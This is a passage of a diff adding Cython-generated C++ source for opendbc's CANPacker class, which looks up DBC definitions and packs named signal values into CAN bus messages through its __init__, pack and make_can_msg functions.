__pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_iteritems __pyx_mstate_global->__pyx_n_s_iteritems +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_make_can_msg __pyx_mstate_global->__pyx_n_s_make_can_msg +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_name_or_addr __pyx_mstate_global->__pyx_n_s_name_or_addr +#define __pyx_n_s_opendbc_can_packer_pyx __pyx_mstate_global->__pyx_n_s_opendbc_can_packer_pyx +#define __pyx_kp_s_opendbc_can_packer_pyx_pyx __pyx_mstate_global->__pyx_kp_s_opendbc_can_packer_pyx_pyx +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_pyx_vtable __pyx_mstate_global->__pyx_n_s_pyx_vtable +#define __pyx_n_s_range __pyx_mstate_global->__pyx_n_s_range +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_kp_s_self_dbc_self_packer_cannot_be_c __pyx_mstate_global->__pyx_kp_s_self_dbc_self_packer_cannot_be_c +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_u_utf8 __pyx_mstate_global->__pyx_n_u_utf8 +#define __pyx_n_s_values __pyx_mstate_global->__pyx_n_s_values +#define __pyx_int_0 __pyx_mstate_global->__pyx_int_0 +#define __pyx_tuple_ __pyx_mstate_global->__pyx_tuple_ +#define __pyx_tuple__3 __pyx_mstate_global->__pyx_tuple__3 +#define __pyx_tuple__5 __pyx_mstate_global->__pyx_tuple__5 +#define __pyx_codeobj__2 __pyx_mstate_global->__pyx_codeobj__2 +#define __pyx_codeobj__4 __pyx_mstate_global->__pyx_codeobj__4 +#define __pyx_codeobj__6 __pyx_mstate_global->__pyx_codeobj__6 +/* #### Code section: module_code ### */ + +/* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *__pyx_v_o) { + Py_ssize_t __pyx_v_length; + char const *__pyx_v_data; + std::string __pyx_r; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + std::string __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_string_from_py_std__in_string", 0); + + /* "string.from_py":14 + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 # <<<<<<<<<<<<<< + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) + */ + __pyx_v_length = 0; + + /* "string.from_py":15 + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) # <<<<<<<<<<<<<< + * return string(data, length) + * + */ + __pyx_t_1 = __Pyx_PyObject_AsStringAndSize(__pyx_v_o, (&__pyx_v_length)); if (unlikely(__pyx_t_1 == ((char const *)NULL))) __PYX_ERR(1, 15, __pyx_L1_error) + __pyx_v_data = __pyx_t_1; + + /* "string.from_py":16 + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) # <<<<<<<<<<<<<< + * + * + */ + try { + __pyx_t_2 = std::string(__pyx_v_data, __pyx_v_length); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 16, __pyx_L1_error) + } + __pyx_r = __pyx_t_2; + goto __pyx_L0; + + /* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("string.from_py.__pyx_convert_string_from_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/packer_pyx.pyx":19 + * map[string, int] name_to_address + * + * def __init__(self, dbc_name): # <<<<<<<<<<<<<< + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: + */ + +/* Python wrapper */ +static int __pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_dbc_name = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_dbc_name,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dbc_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 19, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(0, 19, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + } + __pyx_v_dbc_name = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 19, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker___init__(((struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *)__pyx_v_self), __pyx_v_dbc_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker___init__(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, PyObject *__pyx_v_dbc_name) { + std::vector ::size_type __pyx_v_i; + struct Msg __pyx_v_msg; + int __pyx_r; + __Pyx_RefNannyDeclarations + std::string __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + std::vector ::size_type __pyx_t_5; + std::vector ::size_type __pyx_t_6; + std::vector ::size_type __pyx_t_7; + uint32_t __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__init__", 0); + + /* "opendbc/can/packer_pyx.pyx":20 + * + * def __init__(self, dbc_name): + * self.dbc = dbc_lookup(dbc_name) # <<<<<<<<<<<<<< + * if not self.dbc: + * raise RuntimeError(f"Can't lookup {dbc_name}") + */ + __pyx_t_1 = __pyx_convert_string_from_py_std__in_string(__pyx_v_dbc_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 20, __pyx_L1_error) + __pyx_v_self->dbc = dbc_lookup(__PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_1)); + + /* "opendbc/can/packer_pyx.pyx":21 + * def __init__(self, dbc_name): + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: # <<<<<<<<<<<<<< + * raise RuntimeError(f"Can't lookup {dbc_name}") + * + */ + __pyx_t_2 = (!(__pyx_v_self->dbc != 0)); + if (unlikely(__pyx_t_2)) { + + /* "opendbc/can/packer_pyx.pyx":22 + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: + * raise RuntimeError(f"Can't lookup {dbc_name}") # <<<<<<<<<<<<<< + * + * self.packer = new cpp_CANPacker(dbc_name) + */ + __pyx_t_3 = __Pyx_PyObject_FormatSimple(__pyx_v_dbc_name, __pyx_empty_unicode); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyUnicode_Concat(__pyx_kp_u_Can_t_lookup, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_CallOneArg(__pyx_builtin_RuntimeError, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_t_3, 0, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(0, 22, __pyx_L1_error) + + /* "opendbc/can/packer_pyx.pyx":21 + * def __init__(self, dbc_name): + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: # <<<<<<<<<<<<<< + * raise RuntimeError(f"Can't lookup {dbc_name}") + * + */ + } + + /* "opendbc/can/packer_pyx.pyx":24 + * raise RuntimeError(f"Can't lookup {dbc_name}") + * + * self.packer = new cpp_CANPacker(dbc_name) # <<<<<<<<<<<<<< + * for i in range(self.dbc[0].msgs.size()): + * msg = self.dbc[0].msgs[i] + */ + __pyx_t_1 = __pyx_convert_string_from_py_std__in_string(__pyx_v_dbc_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 24, __pyx_L1_error) + __pyx_v_self->packer = new CANPacker(__pyx_t_1); + + /* "opendbc/can/packer_pyx.pyx":25 + * + * self.packer = new cpp_CANPacker(dbc_name) + * for i in range(self.dbc[0].msgs.size()): # <<<<<<<<<<<<<< + * msg = self.dbc[0].msgs[i] + * self.name_to_address[string(msg.name)] = msg.address + */ + __pyx_t_5 = (__pyx_v_self->dbc[0]).msgs.size(); + __pyx_t_6 = __pyx_t_5; + for (__pyx_t_7 = 0; __pyx_t_7 < __pyx_t_6; __pyx_t_7+=1) { + __pyx_v_i = __pyx_t_7; + + /* "opendbc/can/packer_pyx.pyx":26 + * self.packer = new cpp_CANPacker(dbc_name) + * for i in range(self.dbc[0].msgs.size()): + * msg = self.dbc[0].msgs[i] # <<<<<<<<<<<<<< + * self.name_to_address[string(msg.name)] = msg.address + * + */ + __pyx_v_msg = ((__pyx_v_self->dbc[0]).msgs[__pyx_v_i]); + + /* "opendbc/can/packer_pyx.pyx":27 + * for i in range(self.dbc[0].msgs.size()): + * msg = self.dbc[0].msgs[i] + * self.name_to_address[string(msg.name)] = msg.address # <<<<<<<<<<<<<< + * + * cdef vector[uint8_t] pack(self, addr, values): + */ + __pyx_t_8 = __pyx_v_msg.address; + try { + __pyx_t_1 = std::string(__pyx_v_msg.name); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 27, __pyx_L1_error) + } + (__pyx_v_self->name_to_address[__pyx_t_1]) = __pyx_t_8; + } + + /* "opendbc/can/packer_pyx.pyx":19 + * map[string, int] name_to_address + * + * def __init__(self, dbc_name): # <<<<<<<<<<<<<< + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/packer_pyx.pyx":29 + * self.name_to_address[string(msg.name)] = msg.address + * + * cdef vector[uint8_t] pack(self, addr, values): # <<<<<<<<<<<<<< + * cdef vector[SignalPackValue] values_thing + * values_thing.reserve(len(values)) + */ + +static std::vector __pyx_f_7opendbc_3can_10packer_pyx_9CANPacker_pack(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, PyObject *__pyx_v_addr, PyObject *__pyx_v_values) { + std::vector __pyx_v_values_thing; + struct SignalPackValue __pyx_v_spv; + PyObject *__pyx_v_name = NULL; + PyObject *__pyx_v_value = NULL; + std::vector __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + PyObject *__pyx_t_8 = NULL; + std::string __pyx_t_9; + double __pyx_t_10; + uint32_t __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("pack", 0); + + /* "opendbc/can/packer_pyx.pyx":31 + * cdef vector[uint8_t] pack(self, addr, values): + * cdef vector[SignalPackValue] values_thing + * values_thing.reserve(len(values)) # <<<<<<<<<<<<<< + * cdef SignalPackValue spv + * + */ + __pyx_t_1 = PyObject_Length(__pyx_v_values); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 31, __pyx_L1_error) + try { + __pyx_v_values_thing.reserve(__pyx_t_1); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 31, __pyx_L1_error) + } + + /* "opendbc/can/packer_pyx.pyx":34 + * cdef SignalPackValue spv + * + * for name, value in values.iteritems(): # <<<<<<<<<<<<<< + * spv.name = name.encode("utf8") + * spv.value = value + */ + __pyx_t_1 = 0; + if (unlikely(__pyx_v_values == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "iteritems"); + __PYX_ERR(0, 34, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_dict_iterator(__pyx_v_values, 0, __pyx_n_s_iteritems, (&__pyx_t_3), (&__pyx_t_4)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 34, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_2); + __pyx_t_2 = __pyx_t_5; + __pyx_t_5 = 0; + while (1) { + __pyx_t_7 = __Pyx_dict_iter_next(__pyx_t_2, __pyx_t_3, &__pyx_t_1, &__pyx_t_5, &__pyx_t_6, NULL, __pyx_t_4); + if (unlikely(__pyx_t_7 == 0)) break; + if (unlikely(__pyx_t_7 == -1)) __PYX_ERR(0, 34, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GOTREF(__pyx_t_6); + __Pyx_XDECREF_SET(__pyx_v_name, __pyx_t_5); + __pyx_t_5 = 0; + __Pyx_XDECREF_SET(__pyx_v_value, __pyx_t_6); + __pyx_t_6 = 0; + + /* "opendbc/can/packer_pyx.pyx":35 + * + * for name, value in values.iteritems(): + * spv.name = name.encode("utf8") # <<<<<<<<<<<<<< + * spv.value = value + * values_thing.push_back(spv) + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_name, __pyx_n_s_encode); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 35, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_8 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_8, __pyx_n_u_utf8}; + __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 35, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_9 = __pyx_convert_string_from_py_std__in_string(__pyx_t_6); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 35, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_v_spv.name = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_9); + + /* "opendbc/can/packer_pyx.pyx":36 + * for name, value in values.iteritems(): + * spv.name = name.encode("utf8") + * spv.value = value # <<<<<<<<<<<<<< + * values_thing.push_back(spv) + * + */ + __pyx_t_10 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_10 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 36, __pyx_L1_error) + __pyx_v_spv.value = __pyx_t_10; + + /* "opendbc/can/packer_pyx.pyx":37 + * spv.name = name.encode("utf8") + * spv.value = value + * values_thing.push_back(spv) # <<<<<<<<<<<<<< + * + * return self.packer.pack(addr, values_thing) + */ + try { + __pyx_v_values_thing.push_back(__pyx_v_spv); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 37, __pyx_L1_error) + } + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/packer_pyx.pyx":39 + * values_thing.push_back(spv) + * + * return self.packer.pack(addr, values_thing) # <<<<<<<<<<<<<< + * + * cpdef make_can_msg(self, name_or_addr, bus, values): + */ + __pyx_t_11 = __Pyx_PyInt_As_uint32_t(__pyx_v_addr); if (unlikely((__pyx_t_11 == ((uint32_t)-1)) && PyErr_Occurred())) __PYX_ERR(0, 39, __pyx_L1_error) + __pyx_r = __pyx_v_self->packer->pack(__pyx_t_11, __pyx_v_values_thing); + goto __pyx_L0; + + /* "opendbc/can/packer_pyx.pyx":29 + * self.name_to_address[string(msg.name)] = msg.address + * + * cdef vector[uint8_t] pack(self, addr, values): # <<<<<<<<<<<<<< + * cdef vector[SignalPackValue] values_thing + * values_thing.reserve(len(values)) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.pack", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_name); + __Pyx_XDECREF(__pyx_v_value); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/packer_pyx.pyx":41 + * return self.packer.pack(addr, values_thing) + * + * cpdef make_can_msg(self, name_or_addr, bus, values): # <<<<<<<<<<<<<< + * cdef int addr + * if type(name_or_addr) == int: + */ + +static PyObject *__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_3make_can_msg(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_f_7opendbc_3can_10packer_pyx_9CANPacker_make_can_msg(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, PyObject *__pyx_v_name_or_addr, PyObject *__pyx_v_bus, PyObject *__pyx_v_values, int __pyx_skip_dispatch) { + int __pyx_v_addr; + std::vector __pyx_v_val; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_t_6; + std::string __pyx_t_7; + std::vector __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("make_can_msg", 0); + /* Check if called by wrapper */ + if (unlikely(__pyx_skip_dispatch)) ; + /* Check if overridden in Python */ + else if (unlikely((Py_TYPE(((PyObject *)__pyx_v_self))->tp_dictoffset != 0) || __Pyx_PyType_HasFeature(Py_TYPE(((PyObject *)__pyx_v_self)), (Py_TPFLAGS_IS_ABSTRACT | Py_TPFLAGS_HEAPTYPE)))) { + #if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS + static PY_UINT64_T __pyx_tp_dict_version = __PYX_DICT_VERSION_INIT, __pyx_obj_dict_version = __PYX_DICT_VERSION_INIT; + if (unlikely(!__Pyx_object_dict_version_matches(((PyObject *)__pyx_v_self), __pyx_tp_dict_version, __pyx_obj_dict_version))) { + PY_UINT64_T __pyx_typedict_guard = __Pyx_get_tp_dict_version(((PyObject *)__pyx_v_self)); + #endif + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_make_can_msg); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + #ifdef __Pyx_CyFunction_USED + if (!__Pyx_IsCyOrPyCFunction(__pyx_t_1) + #else + if (!PyCFunction_Check(__pyx_t_1) + #endif + || (PyCFunction_GET_FUNCTION(__pyx_t_1) != (PyCFunction)(void*)__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_3make_can_msg)) { + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_t_1); + __pyx_t_3 = __pyx_t_1; __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[4] = {__pyx_t_4, __pyx_v_name_or_addr, __pyx_v_bus, __pyx_v_values}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 3+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L0; + } + #if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS + __pyx_tp_dict_version = __Pyx_get_tp_dict_version(((PyObject *)__pyx_v_self)); + __pyx_obj_dict_version = __Pyx_get_object_dict_version(((PyObject *)__pyx_v_self)); + if (unlikely(__pyx_typedict_guard != __pyx_tp_dict_version)) { + __pyx_tp_dict_version = __pyx_obj_dict_version = __PYX_DICT_VERSION_INIT; + } + #endif + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + #if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS + } + #endif + } + + /* "opendbc/can/packer_pyx.pyx":43 + * cpdef make_can_msg(self, name_or_addr, bus, values): + * cdef int addr + * if type(name_or_addr) == int: # <<<<<<<<<<<<<< + * addr = name_or_addr + * else: + */ + __pyx_t_1 = PyObject_RichCompare(((PyObject *)Py_TYPE(__pyx_v_name_or_addr)), ((PyObject *)(&PyInt_Type)), Py_EQ); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 43, __pyx_L1_error) + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 43, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (__pyx_t_6) { + + /* "opendbc/can/packer_pyx.pyx":44 + * cdef int addr + * if type(name_or_addr) == int: + * addr = name_or_addr # <<<<<<<<<<<<<< + * else: + * addr = self.name_to_address[name_or_addr.encode("utf8")] + */ + __pyx_t_5 = __Pyx_PyInt_As_int(__pyx_v_name_or_addr); if (unlikely((__pyx_t_5 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 44, __pyx_L1_error) + __pyx_v_addr = __pyx_t_5; + + /* "opendbc/can/packer_pyx.pyx":43 + * cpdef make_can_msg(self, name_or_addr, bus, values): + * cdef int addr + * if type(name_or_addr) == int: # <<<<<<<<<<<<<< + * addr = name_or_addr + * else: + */ + goto __pyx_L3; + } + + /* "opendbc/can/packer_pyx.pyx":46 + * addr = name_or_addr + * else: + * addr = self.name_to_address[name_or_addr.encode("utf8")] # <<<<<<<<<<<<<< + * + * cdef vector[uint8_t] val = self.pack(addr, values) + */ + /*else*/ { + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_name_or_addr, __pyx_n_s_encode); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_n_u_utf8}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_7 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_addr = (__pyx_v_self->name_to_address[__pyx_t_7]); + } + __pyx_L3:; + + /* "opendbc/can/packer_pyx.pyx":48 + * addr = self.name_to_address[name_or_addr.encode("utf8")] + * + * cdef vector[uint8_t] val = self.pack(addr, values) # <<<<<<<<<<<<<< + * return [addr, 0, (&val[0])[:val.size()], bus] + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_addr); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_8 = ((struct __pyx_vtabstruct_7opendbc_3can_10packer_pyx_CANPacker *)__pyx_v_self->__pyx_vtab)->pack(__pyx_v_self, __pyx_t_1, __pyx_v_values); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_val = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_8); + + /* 